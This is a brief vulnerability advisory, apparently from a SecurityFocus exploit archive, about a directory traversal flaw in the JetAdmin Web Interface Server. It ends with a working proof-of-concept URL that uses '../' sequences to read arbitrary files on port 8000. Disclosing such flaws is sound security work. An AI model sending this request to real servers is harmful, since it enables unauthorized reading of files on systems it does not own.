5 lines
No EOL
334 B
Text
5 lines
No EOL
334 B
Text
source: http://www.securityfocus.com/bid/1243/info
|
|
|
|
By default JetAdmin Web Interface Server listens on port 8000. By requesting a specially formed URL which includes "../" it is possible for a remote user to gain read-access to any files outside of the web-published directory.
|
|
|
|
http://target:8000/cgi/wja?page=/../../../filename |